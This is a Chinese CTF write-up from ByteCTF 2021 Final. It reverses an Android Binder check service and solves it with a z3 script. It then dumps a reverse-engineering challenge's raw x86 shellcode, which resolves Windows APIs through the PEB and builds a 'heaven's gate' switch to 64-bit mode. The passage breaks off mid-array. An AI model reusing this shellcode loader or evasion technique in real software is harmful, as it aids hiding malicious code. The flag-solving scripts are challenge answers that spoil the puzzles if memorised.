那么通用的系统中肯定是没有相应的android.os.IByteCTFService的interface以及ByteCTFService的类的,再次观察题目提示会发现给了一个链接,打开网页后拖到最下面得到相应系统的镜像latest.zip文件。

ByteCTF 2021 Final By W&M

ByteCTF 2021 Final By W&M

一开始我想的是直接提取img中的文件,但是发现system.img不是ext4格式,也没有现成的模拟器的img的工具,所以选择将镜像跑起来吧。

使用AS自带的emulator指定下载的镜像启动模拟器,但是我这里最终一直处在开机状态幸好不影响adb,考虑到ByteCTFService的类名,我大致猜到对应的类在 /system/framework/目录的framework.jar和service.jar中,可以通过grep命令确认一下。

ByteCTF 2021 Final By W&M

在提取出两个jar文件后,使用Jadx-gui打开后会发现存在一个A类封装了一批绕来绕去的Function函数,把我给绕晕了。。

ByteCTF 2021 Final By W&M

暂时看不出来这个类的作用,但是在发现ByteCTFServiceImpl后你就会发现,大量引用了这个类中的函数。

ByteCTF 2021 Final By W&M

回到正题,对应Binder机制的transact函数,首先看onTransact函数,其内容大致如下,这就对应了上述的分析“transact()函数前面16次分别对应的code为1-16,每次transact时传递一个参数过去,当code为17时进行flag的check工作,那么非常明显对应的系统中有一个ByteCTFService的Binder服务端。”

 public boolean onTransact(int code, Parcel data, Parcel reply, int flags) throws RemoteException {
       switch (code) {
         case IBinder.INTERFACE_TRANSACTION:
           reply.writeString(IByteCTFService.DESCRIPTOR);
           return true;
         default:
           switch (code) {
             case 1:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x1(data.readInt());
               reply.writeNoException();
               return true;
             case 2:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x2(data.readInt());
               reply.writeNoException();
               return true;
             case 3:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x3(data.readInt());
               reply.writeNoException();
               return true;
             case 4:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x4(data.readInt());
               reply.writeNoException();
               return true;
             case 5:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x5(data.readInt());
               reply.writeNoException();
               return true;
             case 6:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x6(data.readInt());
               reply.writeNoException();
               return true;
             case 7:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x7(data.readInt());
               reply.writeNoException();
               return true;
             case 8:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x8(data.readInt());
               reply.writeNoException();
               return true;
             case 9:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x9(data.readInt());
               reply.writeNoException();
               return true;
             case 10:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x10(data.readInt());
               reply.writeNoException();
               return true;
             case 11:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x11(data.readInt());
               reply.writeNoException();
               return true;
             case 12:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x12(data.readInt());
               reply.writeNoException();
               return true;
             case 13:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x13(data.readInt());
               reply.writeNoException();
               return true;
             case 14:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x14(data.readInt());
               reply.writeNoException();
               return true;
             case 15:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x15(data.readInt());
               reply.writeNoException();
               return true;
             case 16:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               x16(data.readInt());
               reply.writeNoException();
               return true;
             case 17:
               data.enforceInterface(IByteCTFService.DESCRIPTOR);
               boolean check = check();
               reply.writeNoException();
               reply.writeInt(check ? 1 : 0);
               return true;
             default:
               return super.onTransact(code, data, reply, flags);
           }
       }
     }

分析1-16对应的x系列函数会发现其实就是初始化函数

ByteCTF 2021 Final By W&M

而code为17对应的就是最终的check函数,跟到check函数会发现调用了check1-16函数,必须check1-16所有函数返回值都为true才能check成功,而每一个check函数一看又是一堆apply,放弃了分析内容,拷贝到Java工程中跑一跑吧。

又是一番波折,好不容易跑起来了,大概输入了几个x1-x16值测试了下,发现实际上就是一个多元一次方程,很容易想到z3约束求解,那么如何得到方程的参数呢?

将每个check1-16函数返回值类型修改为计算的结果而不是比较的结果,修改后的check函数将比较过程放到了最终的check函数中。

ByteCTF 2021 Final By W&M

这里我用控制变量法发现,当控制x0-x16中任意一个变量变化,其他15个变量固定时,会发现每个check函数在其中一个变量增加1时,其计算出来的值也会相应的发生变化,且差值一定,且每个check函数应该是有一个初值。

以一元一次方程的通式aX+b = c为例,那么相应的差值就应该是相应x1-x16的系数a,初始值就是b,最终对比的结果就是c。

按照找出的规律结合z3进行求解,得到最终的exp:

from z3 import *

init = [717, 789, 846, 686, 977, 681, 911, 774,
        902, 1035, 848, 711, 802, 810, 973, 757]

sub = [
    [87, 92, 18, 55, 21, 93, 27, 19, 82, 60, 77, 24, 13, 88, 78, 69, ],
    [65, 15, 77, 14, 74, 63, 46, 19, 1, 72, 48, 79, 70, 24, 81, 6, ],
    [67, 33, 33, 22, 38, 68, 70, 16, 66, 11, 5, 23, 81, 66, 1, 60, ],
    [83, 71, 96, 6, 67, 4, 11, 88, 53, 91, 1, 7, 66, 42, 23, 84, ],
    [53, 32, 79, 44, 41, 7, 2, 73, 39, 5, 2, 7, 12, 91, 29, 47, ],
    [26, 15, 35, 84, 84, 61, 68, 56, 69, 57, 91, 26, 78, 3, 30, 30, ],
    [12, 72, 92, 32, 78, 26, 43, 34, 62, 7, 26, 37, 42, 51, 2, 72, ],
    [33, 55, 66, 79, 84, 40, 54, 7, 32, 11, 36, 66, 89, 57, 72, 65, ],
    [19, 81, 87, 78, 77, 64, 78, 26, 74, 33, 29, 37, 15, 43, 27, 40, ],
    [10, 40, 6, 19, 35, 73, 27, 13, 10, 70, 93, 97, 47, 79, 86, 95, ],
    [71, 5, 93, 11, 4, 52, 75, 76, 83, 50, 18, 27, 20, 17, 30, 64, ],
    [16, 81, 53, 84, 95, 56, 92, 49, 29, 65, 37, 50, 15, 36, 66, 50, ],
    [42, 14, 42, 41, 84, 45, 11, 7, 30, 66, 62, 15, 96, 94, 31, 58, ],
    [55, 41, 82, 43, 71, 44, 15, 8, 5, 60, 40, 80, 90, 25, 75, 6, ],
    [60, 35, 33, 90, 61, 12, 21, 100, 94, 74, 15, 46, 92, 48, 53, 66, ],
    [65, 29, 74, 52, 8, 64, 75, 13, 11, 6, 87, 49, 79, 44, 77, 84, ]
]

# 右边等式
equal = [67099, 55163, 47068,
         61311, 48233, 62631, 56441, 64310, 67996, 54361, 55525, 71867, 49587,
         55422, 68978, 61502]

if __name__ == '__main__':
    from z3 import *
    s = Solver()
    flag = [BitVec('flag[%d]' % i,8) for i in range(16)]
    for i in range(16):
        temp = init[i]
        for j in range(16):
            temp += sub[i][j]*flag[j]
        s.add(equal[i] == temp)
    print(s.check())
    print(s.model())
    result = ""
    for i in range(16):
        result += chr(s.model()[flag[i]].as_long() & 127) # 这里一定要与127相与,这是因为java的byte和python占位不一致;Java byte 数据类型是8位、有符号的;
    print("flag => ByteCTF{%s}" % result)

最终得到flag :

ByteCTF 2021 Final By W&M

BabyHeaven

文件是一个函数的字节码,先用python提取成字符串形式然后放到自己的c文件中编译。

with open('BabyHeaven','rb+') as f:
    s = f.read()
    for c in s:
        print('\\x'+hex(c)[2:],end='')
#include <stdio.h>
#include <Windows.h>

unsigned char function[] = "\x81\xec\xb4\x1\x0\x0\x66\xc7\x85\x4c\xff\xff\xff\x6b\x0\x66\xc7\x85\x4e\xff\xff\xff\x65\x0\x66\xc7\x85\x50\xff\xff\xff\x72\x0\x66\xc7\x85\x52\xff\xff\xff\x6e\x0\x66\xc7\x85\x54\xff\xff\xff\x65\x0\x66\xc7\x85\x56\xff\xff\xff\x6c\x0\x66\xc7\x85\x58\xff\xff\xff\x33\x0\x66\xc7\x85\x5a\xff\xff\xff\x32\x0\x66\xc7\x85\x5c\xff\xff\xff\x2e\x0\x66\xc7\x85\x5e\xff\xff\xff\x64\x0\x66\xc7\x85\x60\xff\xff\xff\x6c\x0\x66\xc7\x85\x62\xff\xff\xff\x6c\x0\x66\xc7\x85\x64\xff\xff\xff\x0\x0\xc6\x85\x3d\xff\xff\xff\x47\xc6\x85\x3e\xff\xff\xff\x65\xc6\x85\x3f\xff\xff\xff\x74\xc6\x85\x40\xff\xff\xff\x50\xc6\x85\x41\xff\xff\xff\x72\xc6\x85\x42\xff\xff\xff\x6f\xc6\x85\x43\xff\xff\xff\x63\xc6\x85\x44\xff\xff\xff\x41\xc6\x85\x45\xff\xff\xff\x64\xc6\x85\x46\xff\xff\xff\x64\xc6\x85\x47\xff\xff\xff\x72\xc6\x85\x48\xff\xff\xff\x65\xc6\x85\x49\xff\xff\xff\x73\xc6\x85\x4a\xff\xff\xff\x73\xc6\x85\x4b\xff\xff\xff\x0\xc6\x85\x30\xff\xff\xff\x4c\xc6\x85\x31\xff\xff\xff\x6f\xc6\x85\x32\xff\xff\xff\x61\xc6\x85\x33\xff\xff\xff\x64\xc6\x85\x34\xff\xff\xff\x4c\xc6\x85\x35\xff\xff\xff\x69\xc6\x85\x36\xff\xff\xff\x62\xc6\x85\x37\xff\xff\xff\x72\xc6\x85\x38\xff\xff\xff\x61\xc6\x85\x39\xff\xff\xff\x72\xc6\x85\x3a\xff\xff\xff\x79\xc6\x85\x3b\xff\xff\xff\x41\xc6\x85\x3c\xff\xff\xff\x0\xc6\x85\x22\xff\xff\xff\x47\xc6\x85\x23\xff\xff\xff\x65\xc6\x85\x24\xff\xff\xff\x74\xc6\x85\x25\xff\xff\xff\x53\xc6\x85\x26\xff\xff\xff\x79\xc6\x85\x27\xff\xff\xff\x73\xc6\x85\x28\xff\xff\xff\x74\xc6\x85\x29\xff\xff\xff\x65\xc6\x85\x2a\xff\xff\xff\x6d\xc6\x85\x2b\xff\xff\xff\x49\xc6\x85\x2c\xff\xff\xff\x6e\xc6\x85\x2d\xff\xff\xff\x66\xc6\x85\x2e\xff\xff\xff\x6f\xc6\x85\x2f\xff\xff\xff\x0\xc6\x85\x15\xff\xff\xff\x56\xc6\x85\x16\xff\xff\xff\x69\xc6\x85\x17\xff\xff\xff\x72\xc6\x85\x18\xff\xff\xff\x74\xc6\x85\x19\xff\xff\xff\x75\xc6\x85\x1a\xff\xff\xff\x61\xc6\x85\x1b\xff\xff\xff\x6c\xc6\x85\x1c\xff\xff\xff\x41\xc6\x85\x1d\xff\xff\xff\x6c\xc6\x85\x1e\xff\xff\xff\x6c\xc6\x85\x1f\xff\xff\xff\x6f\xc6\x85\x20\xff\xff\xff\x63\xc6\x85\x21\xff\xff\xff\x0\xc6\x85\x6\xff\xff\xff\x56\xc6\x85\x7\xff\xff\xff\x69\xc6\x85\x8\xff\xff\xff\x72\xc6\x85\x9\xff\xff\xff\x74\xc6\x85\xa\xff\xff\xff\x75\xc6\x85\xb\xff\xff\xff\x61\xc6\x85\xc\xff\xff\xff\x6c\xc6\x85\xd\xff\xff\xff\x50\xc6\x85\xe\xff\xff\xff\x72\xc6\x85\xf\xff\xff\xff\x6f\xc6\x85\x10\xff\xff\xff\x74\xc6\x85\x11\xff\xff\xff\x65\xc6\x85\x12\xff\xff\xff\x63\xc6\x85\x13\xff\xff\xff\x74\xc6\x85\x14\xff\xff\xff\x0\xc6\x85\xfa\xfe\xff\xff\x45\xc6\x85\xfb\xfe\xff\xff\x78\xc6\x85\xfc\xfe\xff\xff\x69\xc6\x85\xfd\xfe\xff\xff\x74\xc6\x85\xfe\xfe\xff\xff\x50\xc6\x85\xff\xfe\xff\xff\x72\xc6\x85\x0\xff\xff\xff\x6f\xc6\x85\x1\xff\xff\xff\x63\xc6\x85\x2\xff\xff\xff\x65\xc6\x85\x3\xff\xff\xff\x73\xc6\x85\x4\xff\xff\xff\x73\xc6\x85\x5\xff\xff\xff\x0\xc6\x85\xe9\xfe\xff\xff\x47\xc6\x85\xea\xfe\xff\xff\x65\xc6\x85\xeb\xfe\xff\xff\x74\xc6\x85\xec\xfe\xff\xff\x4d\xc6\x85\xed\xfe\xff\xff\x6f\xc6\x85\xee\xfe\xff\xff\x64\xc6\x85\xef\xfe\xff\xff\x75\xc6\x85\xf0\xfe\xff\xff\x6c\xc6\x85\xf1\xfe\xff\xff\x65\xc6\x85\xf2\xfe\xff\xff\x48\xc6\x85\xf3\xfe\xff\xff\x61\xc6\x85\xf4\xfe\xff\xff\x6e\xc6\x85\xf5\xfe\xff\xff\x64\xc6\x85\xf6\xfe\xff\xff\x6c\xc6\x85\xf7\xfe\xff\xff\x65\xc6\x85\xf8\xfe\xff\xff\x57\xc6\x85\xf9\xfe\xff\xff\x0\xc6\x85\xd9\xfe\xff\xff\x55\xc6\x85\xda\xfe\xff\xff\x6e\xc6\x85\xdb\xfe\xff\xff\x6d\xc6\x85\xdc\xfe\xff\xff\x61\xc6\x85\xdd\xfe\xff\xff\x70\xc6\x85\xde\xfe\xff\xff\x56\xc6\x85\xdf\xfe\xff\xff\x69\xc6\x85\xe0\xfe\xff\xff\x65\xc6\x85\xe1\xfe\xff\xff\x77\xc6\x85\xe2\xfe\xff\xff\x4f\xc6\x85\xe3\xfe\xff\xff\x66\xc6\x85\xe4\xfe\xff\xff\x46\xc6\x85\xe5\xfe\xff\xff\x69\xc6\x85\xe6\xfe\xff\xff\x6c\xc6\x85\xe7\xfe\xff\xff\x65\xc6\x85\xe8\xfe\xff\xff\x0\xc6\x85\xce\xfe\xff\xff\x75\xc6\x85\xcf\xfe\xff\xff\x73\xc6\x85\xd0\xfe\xff\xff\x65\xc6\x85\xd1\xfe\xff\xff\x72\xc6\x85\xd2\xfe\xff\xff\x33\xc6\x85\xd3\xfe\xff\xff\x32\xc6\x85\xd4\xfe\xff\xff\x2e\xc6\x85\xd5\xfe\xff\xff\x64\xc6\x85\xd6\xfe\xff\xff\x6c\xc6\x85\xd7\xfe\xff\xff\x6c\xc6\x85\xd8\xfe\xff\xff\x0\xc6\x85\xc2\xfe\xff\xff\x4d\xc6\x85\xc3\xfe\xff\xff\x65\xc6\x85\xc4\xfe\xff\xff\x73\xc6\x85\xc5\xfe\xff\xff\x73\xc6\x85\xc6\xfe\xff\xff\x61\xc6\x85\xc7\xfe\xff\xff\x67\xc6\x85\xc8\xfe\xff\xff\x65\xc6\x85\xc9\xfe\xff\xff\x42\xc6\x85\xca\xfe\xff\xff\x6f\xc6\x85\xcb\xfe\xff\xff\x78\xc6\x85\xcc\xfe\xff\xff\x41\xc6\x85\xcd\xfe\xff\xff\x0\x8d\x85\x4c\xff\xff\xff\x89\x45\x90\xc7\x45\x8c\x0\x0\x0\x0\x64\xa1\x30\x0\x0\x0\x89\x45\x8c\x8b\x45\x8c\x8b\x40\xc\x89\x45\x88\x8b\x45\x88\x83\xc0\x14\x89\x45\x84\x8b\x45\x84\x8b\x0\x89\x45\x80\xe9\xe4\x0\x0\x0\x8b\x45\x80\x83\xe8\x8\x89\x85\x7c\xff\xff\xff\x8b\x85\x7c\xff\xff\xff\x8b\x40\x30\x89\x85\x78\xff\xff\xff\x8b\x45\x90\x89\x85\x74\xff\xff\xff\x8b\x85\x78\xff\xff\xff\x89\x85\x70\xff\xff\xff\x8b\x85\x74\xff\xff\xff\x89\x85\x6c\xff\xff\xff\x8b\x85\x70\xff\xff\xff\x89\x85\x68\xff\xff\xff\xeb\x63\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x83\xf8\x40\x76\x1d\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x83\xf8\x5a\x77\xe\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x83\xc0\x20\xeb\x9\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x89\x85\x66\xff\xff\xff\x8b\x85\x6c\xff\xff\xff\xf\xb7\x0\x66\x39\x85\x66\xff\xff\xff\x74\x7\xb8\x0\x0\x0\x0\xeb\x2e\x83\x85\x6c\xff\xff\xff\x2\x83\x85\x68\xff\xff\xff\x2\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x85\xc0\x75\x8f\x8b\x85\x6c\xff\xff\xff\xf\xb7\x0\x66\x85\xc0\xf\x94\xc0\xf\xb6\xc0\x85\xc0\x74\xb\x8b\x85\x7c\xff\xff\xff\x8b\x40\x18\xeb\x19\x8b\x45\x80\x8b\x0\x89\x45\x80\x8b\x45\x84\x3b\x45\x80\xf\x85\x10\xff\xff\xff\xb8\x0\x0\x0\x0\x89\x45\xf4\x8b\x45\xf4\x89\x45\xc4\x8d\x85\x3d\xff\xff\xff\x89\x45\xc0\x8b\x45\xc4\x89\x45\xbc\x8b\x45\xbc\x8b\x40\x3c\x89\xc2\x8b\x45\xbc\x1\xd0\x89\x45\xb8\x8b\x45\xb8\x8b\x50\x78\x8b\x45\xc4\x1\xd0\x89\x45\xb4\x8b\x45\xb4\x8b\x50\x20\x8b\x45\xc4\x1\xd0\x89\x45\xb0\x8b\x45\xb4\x8b\x50\x1c\x8b\x45\xc4\x1\xd0\x89\x45\xac\x8b\x45\xb4\x8b\x50\x24\x8b\x45\xc4\x1\xd0\x89\x45\xa8\xc7\x45\xa4\x0\x0\x0\x0\xe9\x91\x0\x0\x0\x8b\x45\xa4\x8d\x14\x85\x0\x0\x0\x0\x8b\x45\xb0\x1\xd0\x8b\x10\x8b\x45\xc4\x1\xd0\x89\x45\xa0\x8b\x45\xa4\x8d\x14\x0\x8b\x45\xa8\x1\xd0\xf\xb7\x0\xf\xb7\xc0\x8d\x14\x85\x0\x0\x0\x0\x8b\x45\xac\x1\xd0\x8b\x0\x89\x45\x9c\x8b\x45\xc0\x89\x45\x98\x8b\x45\xa0\x89\x45\x94\xeb\x8\x83\x45\x98\x1\x83\x45\x94\x1\x8b\x45\x94\xf\xb6\x10\x8b\x45\x98\xf\xb6\x0\x38\xc2\x75\xa\x8b\x45\x94\xf\xb6\x0\x84\xc0\x75\xde\x8b\x45\x98\xf\xb6\x10\x8b\x45\x94\xf\xb6\x0\x38\xc2\xf\x94\xc0\xf\xb6\xc0\x85\xc0\x74\xa\x8b\x55\xc4\x8b\x45\x9c\x1\xd0\xeb\x1a\x83\x45\xa4\x1\x8b\x45\xb4\x8b\x50\x14\x8b\x45\xa4\x39\xc2\xf\x87\x5e\xff\xff\xff\xb8\x0\x0\x0\x0\x89\x45\xf0\x8d\x85\x30\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xec\x8d\x85\x22\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe8\x8d\x85\x15\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe4\x8d\x85\x6\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe0\x8d\x85\xfa\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xbc\xfe\xff\xff\x8d\x85\xe9\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xdc\x8d\x85\xd9\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xb8\xfe\xff\xff\x8d\x85\xce\xfe\xff\xff\x89\x4\x24\x8b\x45\xec\xff\xd0\x83\xec\x4\x89\x45\xd8\x8d\x85\xc2\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xd8\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xb4\xfe\xff\xff\xc7\x4\x24\x0\x0\x0\x0\x8b\x45\xdc\xff\xd0\x83\xec\x4\x89\x45\xd4\x8d\x85\x90\xfe\xff\xff\x89\x4\x24\x8b\x45\xe8\xff\xd0\x83\xec\x4\x8b\x85\x94\xfe\xff\xff\x89\x45\xd0\xc7\x44\x24\xc\x4\x0\x0\x0\xc7\x44\x24\x8\x0\x10\x0\x0\x8b\x45\xd0\x89\x44\x24\x4\xc7\x4\x24\x0\x0\x0\x0\x8b\x45\xe4\xff\xd0\x83\xec\x10\x89\x45\xcc\x8b\x45\xcc\x89\x85\x8c\xfe\xff\xff\x8b\x45\xcc\xc6\x0\x6a\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x33\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xec\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\x89\x45\xc8\x81\x45\xcc\x0\x1\x0\x0\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x57\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xec\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xac\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xab\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x64\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x12\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x68\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x17\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x74\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x78\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x15\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc